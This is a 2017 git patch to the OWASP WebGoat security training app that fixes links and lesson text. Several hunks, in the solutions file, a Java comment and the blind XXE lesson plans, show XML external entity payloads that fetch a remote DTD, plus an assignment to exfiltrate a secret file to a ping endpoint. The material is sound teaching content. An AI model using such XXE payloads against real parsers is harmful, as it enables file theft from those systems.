From 98000d600213b9b0b16ddb0726170fb59a41d627 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 23 Mar 2017 09:37:53 +0100
Subject: [PATCH] Fixing links in several lessons

---
 README.MD                                              |  2 +-
 .../src/main/resources/i18n/WebGoatLabels.properties   |  2 +-
 webgoat-lessons/sol.txt                                |  2 +-
 .../owasp/webgoat/plugin/BlindSendFileAssignment.java  |  2 +-
 .../src/main/resources/i18n/WebGoatLabels.properties   |  2 +-
 .../src/main/resources/lessonPlans/en/XXE_blind.adoc   |  6 +++---
 .../resources/lessonPlans/en/XXE_blind_assignment.adoc |  9 ++++++---
 webgoat-server/pom.xml                                 | 10 +++++-----
 8 files changed, 19 insertions(+), 16 deletions(-)

diff --git a/README.MD b/README.MD
index 8453220ce..e5460ca72 100644
--- a/README.MD
+++ b/README.MD
@@ -100,7 +100,7 @@ On x86 you can build a container with the following commands:
 ```Shell
 cd WebGoat/
 mvn package
-cd webgoat-container
+cd webgoat-server
 mvn package
 mvn docker:build
 docker tag webgoat/webgoat-8.0 webgoat/webgoat-8.0:8.0
diff --git a/webgoat-lessons/jwt/src/main/resources/i18n/WebGoatLabels.properties b/webgoat-lessons/jwt/src/main/resources/i18n/WebGoatLabels.properties
index 3a581a904..9b9f75e31 100644
--- a/webgoat-lessons/jwt/src/main/resources/i18n/WebGoatLabels.properties
+++ b/webgoat-lessons/jwt/src/main/resources/i18n/WebGoatLabels.properties
@@ -1 +1 @@
-jwt.title=JWT tokens
+jwt.title=JWT tokens (Under development)
diff --git a/webgoat-lessons/sol.txt b/webgoat-lessons/sol.txt
index 9b1c2c0aa..c686e4396 100644
--- a/webgoat-lessons/sol.txt
+++ b/webgoat-lessons/sol.txt
@@ -41,7 +41,7 @@ Blind SendFile ...
      * <pre>
      *  <?xml version="1.0"?>
      *  <!DOCTYPE root [
-     *  <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd">
+     *  <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
      *  %remote;
      *   ]>
      *  <user>
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java
index 6961b4fe3..69b0e8e1c 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java
@@ -114,7 +114,7 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
      * <pre>
      *  <?xml version="1.0"?>
      *  <!DOCTYPE root [
-     *  <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd">
+     *  <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
      *  %remote;
      *   ]>
      *  <user>
diff --git a/webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties b/webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties
index b00425df3..864ae5afb 100644
--- a/webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties
+++ b/webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties
@@ -26,7 +26,7 @@ xxe.simple.output=Welcome {0} you can now login to our website
 xxe.content.type.feedback.json=You are posting JSON which does not work with a XXE
 xxe.content.type.feedback.xml=You are posting XML but there is no XXE attack performed
 xxe.content.output=Welcome {0} you can now login to our website
-xxe.blind.output=Contents of the file is:
+xxe.blind.output=Contents of the file is: {0}
 
 xxe.hints.simple.xxe.1=Try submitting the form and see what happens
 xxe.hints.simple.xxe.2=XXE stands for XML External Entity attack
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
index 68cc95ccd..cd615ee26 100644
--- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
+++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
@@ -4,7 +4,7 @@ In some cases you will see no output because although your attack might have wor
 Or the resource you are trying to read contains illegal XML character which causes the parser to fail.
 Let's start with an example, in this case we reference a external DTD which we control on our own server.
 
-Our WebGoat server by default has an /xxe/ping endpoint which we can use. *This can be any server you control.*
+Our WebGoat server by default has an /xxe/ping endpoint which we can use. *This can be any server under your control.*
 
 [source]
 ----
@@ -33,7 +33,7 @@ Now submit the form and change the xml to:
 ----
 <?xml version="1.0"?>
 <!DOCTYPE root [
-<!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/attack.dtd">
+<!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/attack.dtd">
 %remote;
 ]>
 <user>
@@ -51,5 +51,5 @@ GET Java/1.8.0_101 HelloWorld
 So with the XXE we are able to ping our own server which means XXE injection is possible.
 
 [NOTE]
-In this case we use http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd to fetch the dtd but in reality this will
+In this case we use http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd to fetch the dtd but in reality this will
 of course be a host fully under the attackers control.
\ No newline at end of file
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
index 22c2bdff2..005df5198 100644
--- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
+++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
@@ -1,7 +1,10 @@
 == Blind XXE assignment
 
-In the previous page we showed you how you can ping a server with a XXE attack, in this assigment try to make a DTD which will upload the
-contents of ~/.webgoat/plugin/XXE/secret.txt to our server. For Linux: `/home/USER/.webgoat/XXE/secret.txt`, for Windows
-this would be `c:/Users/USER/.webgoat/XXE/secret.txt`
+In the previous page we showed you how you can ping a server with a XXE attack, in this assignment try to make a DTD
+which will upload the contents of ~/.webgoat/plugin/XXE/secret.txt to our server.
+For Linux: `/home/USER/.webgoat/XXE/secret.txt`, for Windows this would be `c:/Users/USER/.webgoat/XXE/secret.txt`
+If you use the Docker based WebGoat environment this file is located here: `/root/.webgoat/XXE/secret.txt`
 
 Try to upload this file using the following endpoint: `http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]` (NOTE: this endpoint is under your full control)
+
+You can login to the Docker container as follows: `docker exec -i -t <<name>> /bin/bash`
\ No newline at end of file
diff --git a/webgoat-server/pom.xml b/webgoat-server/pom.xml
index 78d55dff2..8dff0cda9 100644
--- a/webgoat-server/pom.xml
+++ b/webgoat-server/pom.xml
@@ -86,11 +86,11 @@
             <artifactId>webgoat-container</artifactId>
             <version>${project.version}</version>
         </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>challenge</artifactId>
-            <version>${project.version}</version>
-        </dependency>
+        <!--<dependency>-->
+            <!--<groupId>org.owasp.webgoat.lesson</groupId>-->
+            <!--<artifactId>challenge</artifactId>-->
+            <!--<version>${project.version}</version>-->
+        <!--</dependency>-->
         <dependency>
             <groupId>org.owasp.webgoat.lesson</groupId>
             <artifactId>client-side-filtering</artifactId>